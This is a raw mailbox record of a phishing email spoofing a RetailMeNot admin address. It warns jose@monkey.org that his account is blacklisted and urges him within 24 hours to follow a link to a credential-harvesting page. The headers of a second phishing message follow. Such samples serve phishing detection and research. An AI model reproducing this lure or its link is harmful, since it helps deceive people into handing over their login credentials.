From: "Failure Mail" <admin@retailmenot.com>
Date: Wed, 05 Sep 2018 04:45:58 -0700
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 563

You will not see this in a MIME-aware mail reader.
--===============0671530226==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


 =

    =

   =

	  =

   =

 =

    Dear jose@monkey.org,
 Our current record indicates that your account was detected of spam activi=
ties and as a result has been blacklisted . Failure to confirm and update y=
our account within 24 hours will lead to it being  suspended permanently.

Review and confirm your account below.

   =

   =


 =

    =

    =

   =


	 Review/Confirm Your Email Address	  =

   =


	  =

   =


 =

   =

   =


  =20
--===============0671530226==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><TBODY><TR><TD width=3D"10"></TD><TD width=3D"=
100%"></TD><TD width=3D"20"></TD></TR></TBODY></TABLE>
<TABLE style=3D"FONT-SIZE: 11px; FONT-FAMILY: helvetica, arial, sans-serif;=
 WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT:=
 normal; COLOR: rgb(51,51,51); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; L=
ETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: normal; fo=
nt-variant-caps: normal; -webkit-text-stroke-width: 0px" cellSpacing=3D0 ce=
llPadding=3D0 width=3D"100%" bgColor=3D#ffffff border=3D0>
<TBODY>
<TR>
<TD width=3D20>
<TABLE cellSpacing=3D0 cellPadding=3D1 width=3D20 border=3D0>
<TBODY>
<TR>
<TD></TD></TR></TBODY></TABLE></TD>
<TD style=3D"FONT-SIZE: 15px; FONT-FAMILY: helvetica, arial, sans-serif; CO=
LOR: rgb(51,51,51); LINE-HEIGHT: 18px" align=3Dleft>
<TABLE cellSpacing=3D0 cellPadding=3D1 width=3D1 border=3D0>
<TBODY>
<TR>
<TD></TD></TR></TBODY></TABLE>
<TABLE style=3D"FONT-SIZE: 16px; FONT-FAMILY: helvetica, arial, sans-serif;=
 COLOR: rgb(51,51,51)" cellSpacing=3D0 cellPadding=3D0 width=3D"100%" borde=
r=3D0>
<TBODY>
<TR>
<TD>
<P>Dear jose@monkey.org,</P>
<P>Our current&nbsp;record indicates that your account was detected of spam=
 activities and as a result has been blacklisted . Failure to confirm and u=
pdate your account within 24 hours will lead to it being&nbsp; suspended pe=
rmanently.<BR><BR>Review and&nbsp;confirm your&nbsp;account below.</P></TD>=
</TR>
<TR>
<TD>
<TABLE cellSpacing=3D0 cellPadding=3D1 width=3D1 border=3D0>
<TBODY>
<TR>
<TD><BR></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 align=3Dleft border=3D0>
<TBODY>
<TR>
<TD style=3D"BORDER-TOP: rgb(232,180,99) 1px solid; BORDER-RIGHT: rgb(232,1=
80,99) 1px solid; BORDER-BOTTOM: rgb(232,180,99) 1px solid; BORDER-LEFT: rg=
b(232,180,99) 1px solid; border-radius: 3px" bgColor=3D#ffe86c height=3D30 =
vAlign=3Dmiddle align=3Dcenter>
<TABLE style=3D"FONT-FAMILY: helvetica, arial, sans-serif" cellSpacing=3D0 =
cellPadding=3D0 width=3D"100%" bgColor=3Dtransparent border=3D0>
<TBODY>
<TR>
<TD width=3D13>
<TABLE cellSpacing=3D0 cellPadding=3D1 width=3D13 border=3D0>
<TBODY>
<TR>
<TD><BR></TD></TR></TBODY></TABLE></TD>
<TD><A style=3D"FONT-SIZE: 13px; TEXT-DECORATION: none; FONT-FAMILY: helvet=
ica, arial, sans-serif; WHITE-SPACE: nowrap; FONT-WEIGHT: bold; COLOR: rgb(=
0,0,12); DISPLAY: block" href=3D"http://oegoffshora.com/blam/office/office.=
php?email=3Djose@monkey.org" rel=3Dnoreferrer target=3D_blank><SPAN style=
=3D"FONT-SIZE: 13px; FONT-FAMILY: helvetica, arial, sans-serif; WHITE-SPACE=
: nowrap; FONT-WEIGHT: bold; COLOR: rgb(0,0,0); DISPLAY: block">Review/Con<=
SPAN style=3D"BACKGROUND-COLOR: rgb(255,255,255)"><SPAN></SPAN></SPAN>firm =
Your Email Address</SPAN></A></TD>
<TD width=3D13>
<TABLE cellSpacing=3D0 cellPadding=3D1 width=3D13 border=3D0>
<TBODY>
<TR>
<TD><SPAN style=3D"BACKGROUND-COLOR: rgb(0,0,255)"><SPAN></SPAN></SPAN><BR>=
</TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TAB=
LE></TD></TR></TBODY></TABLE></TD>
<TD width=3D20>
<TABLE cellSpacing=3D0 cellPadding=3D1 width=3D20 border=3D0>
<TBODY>
<TR>
<TD><BR></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>
<TABLE style=3D"FONT-SIZE: 11px; HEIGHT: 51px; FONT-FAMILY: helvetica, aria=
l, sans-serif; WIDTH: 1285px; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-=
TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(51,51,51); FONT-STYLE: nor=
mal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-=
variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-w=
idth: 0px" height=3D51 cellSpacing=3D0 cellPadding=3D0 width=3D1285 bgColor=
=3Dblack border=3D0><SPAN style=3D"FONT-SIZE: 11px; FONT-FAMILY: 'Lucida Gr=
ande', Verdana, Arial, Helvetica, sans-serif; WHITE-SPACE: normal; WORD-SPA=
CING: 0px; TEXT-TRANSFORM: none; FLOAT: none; FONT-WEIGHT: normal; COLOR: r=
gb(51,51,51); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; DISPLAY: inline !i=
mportant; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-=
INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -we=
bkit-text-stroke-width: 0px">&nbsp;</SPAN> =

<TBODY></TBODY></TABLE>
<TABLE style=3D"FONT-SIZE: 11px; FONT-FAMILY: 'Lucida Grande', Verdana, Ari=
al, Helvetica, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRA=
NSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(51,51,51); FONT-STYLE: normal=
; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,=
255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-ca=
ps: normal; -webkit-text-stroke-width: 0px" cellSpacing=3D0 cellPadding=3D1=
 width=3D20 border=3D0>
<TBODY>
<TR>
<TD><SPAN style=3D"BACKGROUND-COLOR: rgb(0,0,255)"><SPAN></SPAN></SPAN><BR>=
</TD></TR></TBODY></TABLE>
<DIV style=3D"FONT-SIZE: 13px; FONT-FAMILY: 'Lucida Grande', Verdana, Arial=
, Helvetica, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANS=
FORM: none; FONT-WEIGHT: normal; COLOR: rgb(51,51,51); FONT-STYLE: normal; =
ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,25=
5,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps=
: normal; -webkit-text-stroke-width: 0px">
<DIV style=3D"BORDER-TOP: 0px; PADDING-TOP: 0px">&nbsp;</DIV></DIV></BODY><=
/HTML>
--===============0671530226==--

From jose@monkey.org Thu Sep  6 10:44:29 2018 +0000
Return-Path: admin@nowinter.cf
Delivered-To: jose@monkey.org
X-FDA: 74579649858.15.night58_6145eaeaf9606
X-Spam-Summary: 75,0,0,34c8adf58313fb76,d41d8cd98f00b204,admin@nowinter.cf,:admin@nowinter.cf,RULES_HIT:2:41:72:379:962:967:969:973:978:983:988:989:1189:1208:1221:1254:1260:1313:1314:1381:1431:1432:1433:1434:1436:1437:1516:1517:1518:1535:1571:1575:1588:1589:1592:1594:1606:1730:1777:1792:1803:2194:2198:2199:2200:2525:2527:2561:2566:2610:2682:2685:2859:2890:2891:2892:2895:2898:2902:2909:2910:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3038:3138:3139:3140:3141:3142:3148:3352:3865:3866:3867:3868:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4118:4362:4428:5007:6261:6650:6678:6684:6687:6688:7652:7903:8550:8603:8957:9025:9075:9082:9121:9908:10215:10346:11233:11473:11658:11914:12043:12295:12301:12438:12555:12561:12740:12752:12895:12903:12963:12986:13019:13137:13139:13150:13156:13228:13230:13231:13236:13237:13374:13439:14096:14129:14149:21063:21080:21325:21347:21433:21450:21451:21483:21524:21605:21611:21627:21790:21810:30001:30016:30026:30054
X-HE-Tag: night58_6145eaeaf9606
X-Filterd-Recvd-Size: 7818
Received: from mail.nowinter.cf (unknown [89.36.215.228])
	by imf20.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu,  6 Sep 2018 10:44:28 +0000 (UTC)
Received: from [0.2.192.102] (unknown [217.61.105.94])
	by mail.nowinter.cf (Postfix) with ESMTPA id 2D81F525E;
	Thu,  6 Sep 2018 04:06:25 -0400 (EDT)
Content-Type: multipart/alternative; boundary="===============0754105086=="
MIME-Version: 1.0
Subject: Comfirm Your Account Information
To: Recipients <admin@nowinter.cf>
